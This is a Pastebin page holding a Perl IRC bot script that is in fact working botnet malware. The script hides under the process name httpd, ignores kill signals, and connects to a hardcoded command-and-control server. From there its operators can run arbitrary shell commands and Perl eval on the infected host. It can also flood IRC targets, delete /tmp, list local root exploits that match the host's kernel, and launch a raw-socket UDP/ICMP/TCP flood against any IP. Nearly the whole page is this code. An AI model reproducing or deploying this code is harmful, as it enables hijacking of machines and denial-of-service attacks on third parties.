API tools faq
paste
Advertisement
VMTragedy

pbot.pl

VMTragedy
Sep 5th, 2014
559
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 14.42 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #ddos command
  3. #>uzxy +Uzxyflood ip packet time#
  4. ####################################
  5. use HTTP::Request;
  6. use LWP::UserAgent;
  7. my $processo = 'usr/sbin/httpd';
  8. my $linas_max='10';
  9. my $sleep='5';
  10. my $cmd="http://h4ck3d.wsnw.net/mic22.txt";
  11. my $id="http://h4ck3d.wsnw.net/mic22.txt";
  12. ############################################
  13. my @adms=("Tragedy Hazel");
  14. my @canais=("#Admin");
  15. #Put your channel here
  16. my @nickname = ("Linux");
  17. my $nick = $nickname[rand scalar @nickname];
  18. #Nickname of bot
  19. my $ircname ='TragedyandhazelsNET';
  20. chop (my $realname = 'uzxy');
  21. #IRC name and Realname
  22. $servidor='tragedyandhazel.ddns.net' unless $servidor;
  23. my $porta='874';
  24. ############################################
  25. $SIG{'INT'} = 'IGNORE';
  26. $SIG{'HUP'} = 'IGNORE';
  27. $SIG{'TERM'} = 'IGNORE';
  28. $SIG{'CHLD'} = 'IGNORE';
  29. $SIG{'PS'} = 'IGNORE';
  30. use IO::Socket;
  31. use Socket;
  32. use IO::Select;
  33. chdir("/");
  34.  
  35. #Connect
  36. $servidor="$ARGV[0]" if $ARGV[0];
  37. $0="$processo"."\0"x16;;
  38. my $pid=fork;
  39. exit if $pid;
  40. die "Masalah fork: $!" unless defined($pid);
  41.  
  42. our %irc_servers;
  43. our %DCC;
  44. my $dcc_sel = new IO::Select->new();
  45. $sel_cliente = IO::Select->new();
  46. sub sendraw {
  47.    if ($#_ == '1') {
  48.       my $socket = $_[0];
  49.       print $socket "$_[1]\n";
  50.  
  51.    } else {
  52.       print $IRC_cur_socket "$_[0]\n";
  53.    }
  54. }
  55.  
  56. sub conectar {
  57.    my $meunick = $_[0];
  58.    my $servidor_con = $_[1];
  59.    my $porta_con = $_[2];
  60.  
  61.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
  62.    PeerPort=>$porta_con) or return(1);
  63.    if (defined($IRC_socket)) {
  64.       $IRC_cur_socket = $IRC_socket;
  65.       $IRC_socket->autoflush(1);
  66.       $sel_cliente->add($IRC_socket);
  67.       $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  68.       $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  69.       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  70.       $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  71.       nick("$meunick");
  72.       sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  73.       sleep 1;
  74.    }
  75. }
  76.  
  77. my $line_temp;
  78. while( 1 ) {
  79.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  80.    select(undef, undef, undef, 0.01); #sleeping for a fraction of a second keeps the script from running to 100 cpu usage ^_^
  81.    delete($irc_servers{''}) if (defined($irc_servers{''}));
  82.    my @ready = $sel_cliente->can_read(0);
  83.    next unless(@ready);
  84.    foreach $fh (@ready) {
  85.       $IRC_cur_socket = $fh;
  86.       $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  87.       $nread = sysread($fh, $msg, 4096);
  88.       if ($nread == 0) {
  89.          $sel_cliente->remove($fh);
  90.          $fh->close;
  91.          delete($irc_servers{$fh});
  92.       }
  93.       @lines = split (/\n/, $msg);
  94.       for(my $c=0; $c<= $#lines; $c++) {
  95.          $line = $lines[$c];
  96.          $line=$line_temp.$line if ($line_temp);
  97.          $line_temp='';
  98.          $line =~ s/\r$//;
  99.          unless ($c == $#lines) {
  100.             parse("$line");
  101.          } else {
  102.             if ($#lines == 0) {
  103.                parse("$line");
  104.             } elsif ($lines[$c] =~ /\r$/) {
  105.                parse("$line");
  106.             } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  107.                parse("$line");
  108.             } else {
  109.                $line_temp = $line;
  110.             }
  111.          }
  112.       }
  113.    }
  114. }
  115.  
  116. sub parse {
  117.    my $servarg = shift;
  118.    if ($servarg =~ /^PING \:(.*)/) {
  119.       sendraw("PONG :$1");
  120.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  121.       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  122.       if ($args =~ /^\001VERSION\001$/) {
  123.          notice("$pn", "\001VERSION mIRC v6.17 w3tw0rk\001");
  124.       }
  125.       if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
  126.          if ($onde eq "$meunick"){
  127.             shell("$pn", "$args");
  128.          }
  129. #End of Connect
  130.          if ($args =~ /^(\Q$meunick\E|\>uzxy)\s+(.*)/ ) {
  131.             my $natrix = $1;
  132.             my $arg = $2;
  133.             if ($arg =~ /^\!(.*)/) {
  134.                ircase("$pn","$onde","$1") unless ($natrix eq ">uzxy" and $arg =~ /^\!nick/);
  135.             } elsif ($arg =~ /^\+(.*)/) {
  136.                $ondep = $onde;
  137.                $ondep = $pn if $onde eq $meunick;
  138.                bfunc("$ondep","$1");
  139.             } else {
  140.                shell("$onde", "$arg");
  141.             }
  142.          }
  143.       }
  144.    }
  145. ######################### End of prefix
  146.    elsif ($servarg =~ /^\:(.+?)\!(.+?)\+(.+?)\s+NICK\s+\:(\S+)/i) {
  147.       if (lc($1) eq lc($meunick)) {
  148.          $meunick=$4;
  149.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  150.       }
  151.    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  152.       nick("$meunick|".int rand(999999));
  153.    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  154.       $meunick = $2;
  155.       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  156.       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  157.       foreach my $canal (@canais) {
  158.          sendraw("JOIN $canal $key");
  159.       }
  160.    }
  161. }
  162.  
  163. sub bfunc {
  164.    my $printl = $_[0];
  165.    my $funcarg = $_[1];
  166.    if (my $pid = fork) {
  167.       waitpid($pid, 0);
  168.    } else {
  169.       if (fork) {
  170.          exit;
  171.       } else {
  172.  
  173.          if ($funcarg =~ /^killme/) {
  174.             sendraw($IRC_cur_socket, "QUIT :");
  175.             $killd = "kill -9 ".fork;
  176.             system (`$killd`);
  177.          }
  178. ######################
  179. #        Rootable    #
  180. ######################
  181. if ($funcarg =~ /^rootable/) {
  182. my $khost = `uname -r`;
  183. my $currentid = `whoami`;
  184. sendraw($IRC_cur_socket, "PRIVMSG $printl Currently you are ".$currentid." ");
  185. sendraw($IRC_cur_socket, "PRIVMSG $printl The kernel of this box is ".$khost." ");
  186. chomp($khost);
  187.  
  188.    my %h;
  189.    $h{'w00t'} = {
  190.       vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20']
  191.    };
  192.    
  193.    $h{'brk'} = {
  194.       vuln=>['2.4.22','2.4.21','2.4.10','2.4.20']
  195.    };
  196.    
  197.    $h{'ave'} = {
  198.       vuln=>['2.4.19','2.4.20']
  199.    };
  200.    
  201.    $h{'elflbl'} = {
  202.       vuln=>['2.4.29']
  203.    };
  204.    
  205.    $h{'elfdump'} = {
  206.       vuln=>['2.4.27']
  207.    };
  208.    
  209.    $h{'expand_stack'} = {
  210.       vuln=>['2.4.29']
  211.    };
  212.    
  213.    $h{'h00lyshit'} = {
  214.       vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13','2.6.14','2.6.15','2.6.16','2.6.2']
  215.    };
  216.    
  217.    $h{'kdump'} = {
  218.       vuln=>['2.6.13']
  219.    };
  220.    
  221.    $h{'km2'} = {
  222.       vuln=>['2.4.18','2.4.22']
  223.    };
  224.    
  225.    $h{'krad'} = {
  226.       vuln=>['2.6.11']
  227.    };
  228.    
  229.    $h{'krad3'} = {
  230.       vuln=>['2.6.11','2.6.9']
  231.    };
  232.    
  233.    $h{'local26'} = {
  234.       vuln=>['2.6.13']
  235.    };
  236.    
  237.    $h{'loko'} = {
  238.       vuln=>['2.4.22','2.4.23','2.4.24']
  239.    };
  240.    
  241.    $h{'mremap_pte'} = {
  242.       vuln=>['2.4.20','2.2.25','2.4.24']
  243.    };
  244.    
  245.    $h{'newlocal'} = {
  246.       vuln=>['2.4.17','2.4.19','2.4.18']
  247.    };
  248.    
  249.    $h{'ong_bak'} = {
  250.       vuln=>['2.4.','2.6.']
  251.    };
  252.    
  253.    $h{'ptrace'} = {
  254.       vuln=>['2.2.','2.4.22']
  255.    };
  256.    
  257.    $h{'ptrace_kmod'} = {
  258.       vuln=>['2.4.2']
  259.    };
  260.    
  261.    $h{'ptrace24'} = {
  262.       vuln=>['2.4.9']
  263.    };
  264.    
  265.    $h{'pwned'} = {
  266.       vuln=>['2.4.','2.6.']
  267.    };
  268.    
  269.    $h{'py2'} = {
  270.       vuln=>['2.6.9','2.6.17','2.6.15','2.6.13']
  271.    };
  272.    
  273.    $h{'raptor_prctl'} = {
  274.       vuln=>['2.6.13','2.6.17','2.6.16','2.6.13']
  275.    };
  276.    
  277.    $h{'prctl3'} = {
  278.       vuln=>['2.6.13','2.6.17','2.6.9']
  279.    };
  280.    
  281.    $h{'remap'} = {
  282.       vuln=>['2.4.']
  283.    };
  284.    
  285.    $h{'rip'} = {
  286.       vuln=>['2.2.']
  287.    };
  288.    
  289.    $h{'stackgrow2'} = {
  290.       vuln=>['2.4.29','2.6.10']
  291.    };
  292.    
  293.    $h{'uselib24'} = {
  294.       vuln=>['2.4.29','2.6.10','2.4.22','2.4.25']
  295.    };
  296.    
  297.    $h{'newsmp'} = {
  298.       vuln=>['2.6.']
  299.    };
  300.    
  301.    $h{'smpracer'} = {
  302.       vuln=>['2.4.29']
  303.    };
  304.    
  305.    $h{'loginx'} = {
  306.       vuln=>['2.4.22']
  307.    };
  308.    
  309.    $h{'exp.sh'} = {
  310.       vuln=>['2.6.9','2.6.10','2.6.16','2.6.13']
  311.    };
  312.    
  313.    $h{'prctl'} = {
  314.       vuln=>['2.6.']
  315.    };
  316.    
  317.    $h{'kmdx'} = {
  318.       vuln=>['2.6.','2.4.']
  319.    };
  320.    
  321.    $h{'raptor'} = {
  322.       vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
  323.    };
  324.    
  325.    $h{'raptor2'} = {
  326.       vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
  327.    };
  328.    
  329. foreach my $key(keys %h){
  330. foreach my $kernel ( @{ $h{$key}{'vuln'} } ){
  331.    if($khost=~/^$kernel/){
  332.    chop($kernel) if ($kernel=~/.$/);
  333.    sendraw($IRC_cur_socket, "PRIVMSG $printl Possible Local Root Exploits: ". $key ." ");
  334.       }
  335.    }
  336. }
  337. }
  338.  
  339. # A /tmp cleaner
  340. if ($funcarg =~ /^cleartmp/) {
  341.     system 'cd /tmp;rm -rf *';
  342.          sendraw($IRC_cur_socket, "PRIVMSG $printl /tmp is Cleaned");
  343.          }
  344. ######################
  345. #    MULTI SCANNER   #
  346. ######################
  347. #     UDPFlood       #
  348. ######################
  349.          if ($funcarg =~ /^Uzxyflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  350.             sendraw($IRC_cur_socket, "PRIVMSG $printl : 4Attacking 14".$1." 4with 14".$2." 4Packets 14for ".$3." 4seconds");
  351.             my ($dtime, %pacotes) = Uzxyflood("$1", "$2", "$3");
  352.             $dtime = 1 if $dtime == 0;
  353.             my %bytes;
  354.             $bytes{igmp} = $2 * $pacotes{igmp};
  355.             $bytes{icmp} = $2 * $pacotes{icmp};
  356.             $bytes{o} = $2 * $pacotes{o};
  357.             $bytes{udp} = $2 * $pacotes{udp};
  358.             $bytes{tcp} = $2 * $pacotes{tcp};
  359.             sendraw($IRC_cur_socket, "PRIVMSG $printl : 4Attack Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)."Kb in ".$dtime." seconds to ".$1."");
  360.          }
  361. ######################
  362. #  End of Udpflood   #
  363. ######################
  364.          exit;
  365.       }
  366.    }
  367.  
  368. sub ircase {
  369.    my ($kem, $printl, $case) = @_;
  370.    if ($case =~ /^join (.*)/) {
  371.       j("$1");
  372.    }
  373.    if ($case =~ /^part (.*)/) {
  374.       p("$1");
  375.    }
  376.    if ($case =~ /^rejoin\s+(.*)/) {
  377.       my $chan = $1;
  378.       if ($chan =~ /^(\d+) (.*)/) {
  379.          for (my $ca = 1; $ca <= $1; $ca++ ) {
  380.             p("$2");
  381.             j("$2");
  382.          }
  383.       } else {
  384.          p("$chan");
  385.          j("$chan");
  386.       }
  387.    }
  388.  
  389.    if ($case =~ /^op/) {
  390.       op("$printl", "$kem") if $case eq "op";
  391.       my $oarg = substr($case, 3);
  392.       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  393.    }
  394.  
  395.    if ($case =~ /^deop/) {
  396.       deop("$printl", "$kem") if $case eq "deop";
  397.       my $oarg = substr($case, 5);
  398.       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  399.    }
  400.  
  401.    if ($case =~ /^msg\s+(\S+) (.*)/) {
  402.       msg("$1", "$2");
  403.    }
  404.  
  405.    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  406.       for (my $cf = 1; $cf <= $1; $cf++) {
  407.          msg("$2", "$3");
  408.       }
  409.    }
  410.  
  411.    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
  412.       ctcp("$1", "$2");
  413.    }
  414.  
  415.    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  416.       for (my $cf = 1; $cf <= $1; $cf++) {
  417.          ctcp("$2", "$3");
  418.       }
  419.    }
  420.  
  421.    if ($case =~ /^nick (.*)/) {
  422.       nick("$1");
  423.    }
  424.  
  425.    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
  426.       conectar("$2", "$1", 6667);
  427.    }
  428.  
  429.    if ($case =~ /^raw (.*)/) {
  430.       sendraw("$1");
  431.    }
  432.  
  433.    if ($case =~ /^eval (.*)/) {
  434.       eval "$1";
  435.    }
  436. }
  437.  
  438. sub get_html() {
  439. $test=$_[0];
  440.  
  441.       $ip=$_[1];
  442.       $port=$_[2];
  443.  
  444. my $req=HTTP::Request->new(GET=>$test);
  445. my $ua=LWP::UserAgent->new();
  446. if(defined($ip) && defined($port)) {
  447.       $ua->proxy("http","http://$ip:$port/");
  448.       $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  449. }
  450. $ua->timeout(1);
  451. my $response=$ua->request($req);
  452. if ($response->is_success) {
  453.    $re=$response->content;
  454. }
  455. return $re;
  456. }
  457.  
  458. sub addproc {
  459.  
  460.    my $proc=$_[0];
  461.    my $dork=$_[1];
  462.    
  463.    open(FILE,">>/var/tmp/pids");
  464.    print FILE $proc." [".$irc_servers{$IRC_cur_socket}{'nick'}."] $dork\n";
  465.    close(FILE);
  466. }
  467.  
  468.  
  469. sub delproc {
  470.  
  471.    my $proc=$_[0];
  472.    open(FILE,"/var/tmp/pids");
  473.  
  474.    while(<FILE>) {
  475.       $_ =~ /(\d+)\s+(.*)/;
  476.       $childs{$1}=$2;
  477.    }
  478.    close(FILE);
  479.    delete($childs{$proc});
  480.  
  481.    open(FILE,">/var/tmp/pids");
  482.  
  483.    for $klucz (keys %childs) {
  484.       print FILE $klucz." ".$childs{$klucz}."\n";
  485.    }
  486. }
  487.  
  488. sub shell {
  489.    my $printl=$_[0];
  490.    my $comando=$_[1];
  491.    if ($comando =~ /cd (.*)/) {
  492.       chdir("$1") || msg("$printl", "No such file or directory");
  493.       return;
  494.    } elsif ($pid = fork) {
  495.       waitpid($pid, 0);
  496.    } else {
  497.       if (fork) {
  498.          exit;
  499.       } else {
  500.          my @resp=`$comando 2>&1 3>&1`;
  501.          my $c=0;
  502.          foreach my $linha (@resp) {
  503.             $c++;
  504.             chop $linha;
  505.             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  506.             if ($c == "$linas_max") {
  507.                $c=0;
  508.                sleep $sleep;
  509.             }
  510.          }
  511.          exit;
  512.       }
  513.    }
  514. }
  515.  
  516. sub Uzxyflood {
  517.    my $iaddr = inet_aton($_[0]);
  518.    my $msg = 'A' x $_[1];
  519.    my $ftime = $_[2];
  520.    my $cp = 0;
  521.    my (%pacotes);
  522.    $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  523.    socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  524.    socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  525.    socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  526.    socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  527.    return(undef) if $cp == 4;
  528.    my $itime = time;
  529.    my ($cur_time);
  530.    while ( 1 ) {
  531.       for (my $porta = 1; $porta <= 65000; $porta++) {
  532.          $cur_time = time - $itime;
  533.          last if $cur_time >= $ftime;
  534.          send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
  535.          send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
  536.          send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
  537.          send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
  538.          for (my $pc = 3; $pc <= 255;$pc++) {
  539.             next if $pc == 6;
  540.             $cur_time = time - $itime;
  541.             last if $cur_time >= $ftime;
  542.             socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  543.             send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
  544.          }
  545.       }
  546.       last if $cur_time >= $ftime;
  547.    }
  548.    return($cur_time, %pacotes);
  549. }
  550.  
  551. sub ctcp {
  552.    return unless $#_ == 1;
  553.    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  554. }
  555.  
  556. sub msg {
  557.    return unless $#_ == 1;
  558.    sendraw("PRIVMSG $_[0] :$_[1]");
  559. }
  560.  
  561. sub notice {
  562.    return unless $#_ == 1;
  563.    sendraw("NOTICE $_[0] :$_[1]");
  564. }
  565.  
  566. sub op {
  567.    return unless $#_ == 1;
  568.    sendraw("MODE $_[0] +o $_[1]");
  569. }
  570.  
  571. sub deop {
  572.    return unless $#_ == 1;
  573.    sendraw("MODE $_[0] -o $_[1]");
  574. }
  575.  
  576. sub j {
  577.    &join(@_);
  578. }
  579.  
  580. sub join {
  581.    return unless $#_ == 0;
  582.    sendraw("JOIN $_[0]");
  583. }
  584.  
  585. sub p {
  586.    part(@_);
  587. }
  588.  
  589. sub part {
  590.    sendraw("PART $_[0]");
  591. }
  592.  
  593. sub nick {
  594.    return unless $#_ == 0;
  595.    sendraw("NICK $_[0]");
  596. }
  597.  
  598. sub quit {
  599.    sendraw("QUIT :$_[0]");
  600. }
  601. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!